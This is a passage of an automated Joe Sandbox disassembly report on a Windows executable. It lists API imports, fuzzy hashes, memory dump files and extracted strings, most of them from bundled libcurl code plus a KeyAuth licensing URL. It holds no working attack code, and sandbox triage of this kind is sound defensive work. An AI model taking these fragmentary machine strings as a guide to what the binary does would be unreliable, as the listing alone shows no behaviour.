                                        • Opcode Fuzzy Hash: 52d69756cb498b6cbae8a9f5df6243dd581b2c397a197d2a953b2a52a7e64667
                                        • Instruction Fuzzy Hash: 9DA19A72F0864285FB10EB62E8606BD2BA4BF44B9CF651931DE0C97696EFBCE544C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: calloc$free$strchrstrncpy$_strdupmallocstrncmpstrrchr
                                        • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                        • API String ID: 2243338858-131330169
                                        • Opcode ID: a534b1e47e6b89b57045d23a567eff78843472f2b3767f7a7f203d093dd9f04f
                                        • Instruction ID: fea386d716d1afe3f6ccb4ef1dccf90cede743e43fabbbdb1ae201097eee5f59
                                        • Opcode Fuzzy Hash: a534b1e47e6b89b57045d23a567eff78843472f2b3767f7a7f203d093dd9f04f
                                        • Instruction Fuzzy Hash: 1A91AD32B0878282EF548B26D4543B97BA0FF85B88F644075DE9E83796EF7CE4958701
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAD13
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAD8D
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BADB1
                                        • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE00
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE3A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE4C
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE5F
                                        • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE7A
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE90
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029C19C9,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029BAE99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$fclose$__acrt_iob_func_unlinkcallocfputsqsort
                                        • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                        • API String ID: 1368378007-4087121635
                                        • Opcode ID: 77a6b52ac05e3fa1a879076784fd047fa84354676dcf23460523790ff3c71d28
                                        • Instruction ID: d0cf34c20efd54bb93fa8b155730acd27bfda02eaa7416be2603c7209f36a93b
                                        • Opcode Fuzzy Hash: 77a6b52ac05e3fa1a879076784fd047fa84354676dcf23460523790ff3c71d28
                                        • Instruction Fuzzy Hash: E8519325B0D74685FF669B23AA5427A2BA0BF84BDDF644431DD4EC7392EEBCE405C200
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno
                                        • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                        • API String ID: 3939687465-1752685260
                                        • Opcode ID: 25adad5ac7b8ccfe19bb9cb406b551687a5dcdd2bcf657889b2ccb51d25d1618
                                        • Instruction ID: c5974e0528dc52e29a702fd2a0532fcb2132b36f6153e5561a115b92d9ae9125
                                        • Opcode Fuzzy Hash: 25adad5ac7b8ccfe19bb9cb406b551687a5dcdd2bcf657889b2ccb51d25d1618
                                        • Instruction Fuzzy Hash: 65519322E0C78285F7628F62A5943BA7BA4FF49B48F604436DE4D82696DFBCE544C710
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A55DE
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029A560C
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029A561A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A5654
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A56A5
                                        • memset.VCRUNTIME140 ref: 00007FF6029A54D3
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                          • Part of subcall function 00007FF6029A6320: memcpy.VCRUNTIME140 ref: 00007FF6029A6496
                                          • Part of subcall function 00007FF6029A1FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2131
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A5812
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029A583E
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029A584C
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A5887
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A58DA
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A59C1
                                        • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6029A59D9
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6029A59E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcpy$?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@memset
                                        • String ID: value
                                        • API String ID: 2102519606-494360628
                                        • Opcode ID: 85c86dc14542eb07a4e2cce666541bb6ed81f2a7a3d6649cdfb2e986ccf9b187
                                        • Instruction ID: a06827e74ae3b7bc6398bdae1e93c5656f2e63c9228ad080c905885a7ab065f0
                                        • Opcode Fuzzy Hash: 85c86dc14542eb07a4e2cce666541bb6ed81f2a7a3d6649cdfb2e986ccf9b187
                                        • Instruction Fuzzy Hash: 12F1C822F1878185EB10CB65E4843AD6B60FF457ACF645231EAAD43AEADFBCD185C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Cert$CertificateCertificatesContextEnumFreeStore
                                        • String ID: ALPN, server did not agree to a protocol$http/1.1$schannel: ALPN, server accepted to use %.*s$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                        • API String ID: 2572311694-3353508759
                                        • Opcode ID: df49efb58282867fe4246f3edf456b3058b6d8c19a530c5cfbcd38b06cd5e023
                                        • Instruction ID: 7470f3ac2a16196fb0ac93a459c08cec7b6a30ec36eb464c999024b486b15b0b
                                        • Opcode Fuzzy Hash: df49efb58282867fe4246f3edf456b3058b6d8c19a530c5cfbcd38b06cd5e023
                                        • Instruction Fuzzy Hash: ADB1A362A08A8382EB609F26D8603BA6B91FF84B8CF654035DA4DC7796DFBCD445D740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$strchr$_strdup
                                        • String ID: %s$1.1$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                        • API String ID: 1922034842-2519073162
                                        • Opcode ID: f678b0adb032897e825a3959cded84015825f3098b179514a4a53f8d0ccb62c7
                                        • Instruction ID: 33bb1802bd52ab9574d53a727add40c7c85b80b5bc8725fc0ef7c928dc8121f8
                                        • Opcode Fuzzy Hash: f678b0adb032897e825a3959cded84015825f3098b179514a4a53f8d0ccb62c7
                                        • Instruction Fuzzy Hash: E2916E21E0C68785FB61CB1399607B96B90AF55B8CF684032DE4DC7687EEADF941E300
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF6029F063F), ref: 00007FF6029FD93D
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0000000100000000,?,00007FF6029F063F), ref: 00007FF6029FD95F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF6029F063F), ref: 00007FF6029FD970
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0000000100000000,?,00007FF6029F063F), ref: 00007FF6029FD99E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID: ../$/..$/../$/./
                                        • API String ID: 111713529-456519384
                                        • Opcode ID: 857da92cb3a3f1754f39fc764212752e7e357566b0f0400f53a9762f759e9239
                                        • Instruction ID: f4ac832df84c245251defd7c5b97b97583a9a1505f5674b6a797526ceb7797eb
                                        • Opcode Fuzzy Hash: 857da92cb3a3f1754f39fc764212752e7e357566b0f0400f53a9762f759e9239
                                        • Instruction Fuzzy Hash: 7871FB21F4C78285FBE25F12911027A6FA0AF16BACF244135DE9D876D6DFACE451C321
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID: Signature: %s$%s$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$FALSE$Signature$TRUE
                                        • API String ID: 111713529-3006446216
                                        • Opcode ID: 200754a7ecd74751d0d0f218d2af814f9b8d9ce5487ad7d3185f1178ac2759fe
                                        • Instruction ID: 8f7d9472f7f244ac4f0f0f3b2014002176f2f7164674d84891b35334b617a1d0
                                        • Opcode Fuzzy Hash: 200754a7ecd74751d0d0f218d2af814f9b8d9ce5487ad7d3185f1178ac2759fe
                                        • Instruction Fuzzy Hash: 9B71C5A2A4C7C285EBD18B2A90142BA7FA0FF46B4DF784436DA4D83357DEACE145C301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: DIGEST-MD5 handshake failure (empty challenge message)$WDigest
                                        • API String ID: 2190258309-1086287758
                                        • Opcode ID: 1779b8da94a52f304d77eab76b8d7191a6ca75d21197fcb052c39a47429940b3
                                        • Instruction ID: 19ad8878e6ba46f0f2f208efcd378bf2e5b5f0ad09f10c5d0bf8e402ee24837b
                                        • Opcode Fuzzy Hash: 1779b8da94a52f304d77eab76b8d7191a6ca75d21197fcb052c39a47429940b3
                                        • Instruction Fuzzy Hash: E2B12D72A08B4686EB908F66E8502AE7BB4FF48B98F600036EE4D87B55DF7CD545C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: RSA Public Key (%lu bits)$%lu$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$rsa(e)$rsa(n)$rsaEncryption
                                        • API String ID: 1294909896-1220118048
                                        • Opcode ID: 1d1110436c56714bc0a77362081bcd18c01486656a23b9c45d484ea6f6e93efa
                                        • Instruction ID: a559805dac8e66d04fdae93e7c1b29cc3722ea285e977e97af30103c15206804
                                        • Opcode Fuzzy Hash: 1d1110436c56714bc0a77362081bcd18c01486656a23b9c45d484ea6f6e93efa
                                        • Instruction Fuzzy Hash: D9716261A4878645FBA4DB53A5402FA2B51FF89B88F644032EE4D9378AEEBCE505C640
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloctolower
                                        • String ID: %%%02x
                                        • API String ID: 1244608590-4020994737
                                        • Opcode ID: b8f44fdf09287624069804cbfaa0b43cc3d274ce18ca51c3b5f051757dda9693
                                        • Instruction ID: a7d2d884dcdc7bd7b626472e229b7e925a516517fde9f5c7a577c3d2dc5c5cc0
                                        • Opcode Fuzzy Hash: b8f44fdf09287624069804cbfaa0b43cc3d274ce18ca51c3b5f051757dda9693
                                        • Instruction Fuzzy Hash: B8A1A122A0D68245FF618B2294103792FE0BF55B9CF294472DEDE86AD7FEADE445C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID: $CAPABILITY$EXAMINE$EXPUNGE$FETCH$LIST$LSUB$NOOP$PREA$SEARCH$SELECT$STORE$UID$Unexpected continuation response
                                        • API String ID: 1475443563-555813803
                                        • Opcode ID: 6aacb1f40ce8f6e5703121245ec5c70de1d34ce0d8995388f34ba0fa44fb25ae
                                        • Instruction ID: 0f045f163695625995f6125b776a9c62bb3e06913f77f6986e8b745fd761c85c
                                        • Opcode Fuzzy Hash: 6aacb1f40ce8f6e5703121245ec5c70de1d34ce0d8995388f34ba0fa44fb25ae
                                        • Instruction Fuzzy Hash: 04D19F63E0C24641FF645E26C5443B86E91AF52B9CF649031DA1DCB98BEFECE941E321
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID:
                                        • API String ID: 111713529-0
                                        • Opcode ID: ae1d98bfd8e04e6bfd092f3e447af08f8539a1ef12be664cab5b6475120f3e2f
                                        • Instruction ID: 1ecb0ac762236f865acbccfa65ecf2cb0bf68749342b5e99d5ea251e3c419f3c
                                        • Opcode Fuzzy Hash: ae1d98bfd8e04e6bfd092f3e447af08f8539a1ef12be664cab5b6475120f3e2f
                                        • Instruction Fuzzy Hash: C4616966A05B4283EB25DF16A45426ABBA4FF88B98B154435DF8E83790EF7CE494D300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: ABOR$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                        • API String ID: 1294909896-2312071747
                                        • Opcode ID: b331923ff8b24726b111a90d0b4457969673eeb4b601481a3a6101cd046fd545
                                        • Instruction ID: 8bde08ce9fe14d0cae9178d98045bec192f187f8514e641fda6f8fcc6c407646
                                        • Opcode Fuzzy Hash: b331923ff8b24726b111a90d0b4457969673eeb4b601481a3a6101cd046fd545
                                        • Instruction Fuzzy Hash: 5CD19172E0C68296EF64DB2295503BA6A54BF457ACF640631DE6E836C3EFECF4458301
                                        APIs
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                          • Part of subcall function 00007FF6029A6320: memcpy.VCRUNTIME140 ref: 00007FF6029A6496
                                          • Part of subcall function 00007FF6029A1FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2131
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AA861
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029AA88F
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029AA89D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AA8D7
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AA934
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AA9ED
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029AAA1B
                                        • __std_exception_destroy.VCRUNTIME140 ref: 00007FF6029AAA29
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AAA63
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AAAB4
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029AAAFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
